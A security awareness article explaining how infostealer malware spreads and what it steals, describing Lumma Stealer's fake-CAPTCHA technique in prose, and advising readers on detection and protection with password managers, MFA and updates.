Infostealers: the new trend in cybercrime
Infostealers are a growing cyber threat aimed at stealing personal data, passwords, and other sensitive information. This article answers frequently asked questions, explains the principle of infostealers, and provides key recommendations for protection.
Imagine you're browsing the internet and coming across a premium program that is available for free download. You enthusiastically download, launch, and rejoice at how smartly you've saved. But the "free" program was an infostealer, surreptitiously planted by an attacker - and while you think you're getting something, he's already quietly searching your computer and stealing your data.
Infostealers are a type of spyware. They are designed to remain as stealthy as possible and stealthily collect and send sensitive information to attackers. These threats often spread through trusted:
- infected links and email attachments;
- fake software download sites;
- fraudulent websites.
Infostealers exist for all operating systems on mobile devices (Android, iOS) and computers (Windows, Linux, macOS). Their threat is, therefore, more than accurate for users.
What info. does the infostealer collect?
Infostealers operate covertly and are challenging to detect. We wouldn't be far off the mark if we said they can steal almost anything. The most commonly collected data include:
- Login credentials: names, passwords, cookies, and stored login tokens from web browsers.
- Payment details: credit card numbers, CVV/CVC codes, banking logins.
- Personal data: emails, phone numbers, addresses or text files, documents, emails.
- System information: operating system version, list of installed applications, and network configuration.
- Application data: messages from communication platforms, access keys to corporate accounts, or encryption keys.
How does infostealer work?
The primary goal of infostealers is to steal data. However, they can also do several other things. For example, an infostealer may allow an attacker to:
- record keystrokes (keylogging), which will enable them to find out not only passwords but also the content of messages;
- abuse the power of your device to mine cryptocurrencies or spread attacks (botnet),
- display unsolicited advertising and redirect users to malicious sites (adware);
- remotely control computer and gain permanent access to your system (backdoor, for example, Remote Access Trojan);
- take screenshots to capture sensitive information from applications or websites.
The most widely used infostealer of all time?
Lumma Stealer is one of the most active infostealers of its kind. It uses various methods to spread its message, including fake CAPTCHA pages, for example, as part of the ClickFix campaign. These trick users into running a command that downloads malicious code to their device. The malware masquerades as standard software and can bypass antivirus protection. Once it infects the system, it scans files and sends sensitive data to the attackers.
The image below illustrates one of the techniques used by Lumma Stealer - a fake CAPTCHA page that automatically copies malicious PowerShell code to the victim's clipboard. The user is then instructed to open the Run window (Win + R), paste the code (CTRL + V), and execute it by pressing Enter, unknowingly activating the attack. This approach bypasses traditional security mechanisms and ensures the exfiltration of sensitive data directly from the infected device.
Infostealer, making history?
Recent incidents published by HudsonRock show the profound impact of infostealer infections:
- Infostealer infections: Reached 27.5 million incidents, triple that of the largest botnets, such as Necurs, with 9 million infections.
- Attack on the healthcare sector: A single compromised Citrix account led to a ransom of $22 million.
What are the symptoms of infostealer on the device?
Infostealers work subtly, and their detection is not straightforward. However, specific signals may indicate an infection:
- Unusual logins: services such as Google, Microsoft, or university systems may alert you to login attempts from an unknown location.
- Changes to account settings: you've received a notification about a password change.
- Suspicious system activity: you notice higher system utilization (more memory usage), windows briefly pop up and quickly disappear, and you discover messages you didn't write.
Do you suspect an infostealer and want to remove it? Follow our guide.
How to protect yourself?
First and foremost, be cautious, don't log in to suspicious sites, don't click on links indiscriminately, and always check the authenticity of login prompts. Then, use proven security tools and measures to minimise the risk of login theft:
Password Manager
Stores and encrypts login credentials generates unique passwords, and protects them with a master password. The main advantage is that a password manager encrypts the stored data end-to-end so that even the service provider cannot access it.
Long-term protection
Keep your system secure with regular updates, use a reliable antivirus (such as Windows Defender integrated into Windows or ESET for broader protection), and monitor for suspicious activity such as unusual logins or unauthorized account changes.
Multi-factor authentication
Prevents unauthorized access even in the event of a password leak. If an attacker gets access to your password without a second factor (such as a code from an authentication app, SMS, or hardware key), they will not be able to log in.
Watch out for the master password leak! If an attacker discovers your master password for the password manager, they will gain access to all stored passwords. First, ensure that your device is not infected with malware, such as an infostealer—perform a thorough scan and clean your system. Only then should you change the passwords for key services (email, banking, social networks) and set a new, strong master password. Also, the administrator should activate MFA to prevent an attacker from taking over the account.
Conclusion
Infostealers are a silent but perilous threat that can lead to serious security incidents. Prevention is key: use a password manager, avoid suspicious files, and open links cautiously. Remember that no operating system is entirely immune to infection, so updating software and taking security precautions regularly is essential. The fact that infostealers are a current threat is confirmed by a warning from Masaryk University's cybersecurity team, which you can read here.
Resources
- https://www.infostealers.com/article/botnets-are-dead-long-live-infostealers-a-comparison/
- https://www.infostealers.com/article/what-are-info-stealers/
- https://objective-see.org/blog/blog_0x7D.html
- https://www.eset.com/cz/spyware/
- https://www.eset.com/cz/infostealer/
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma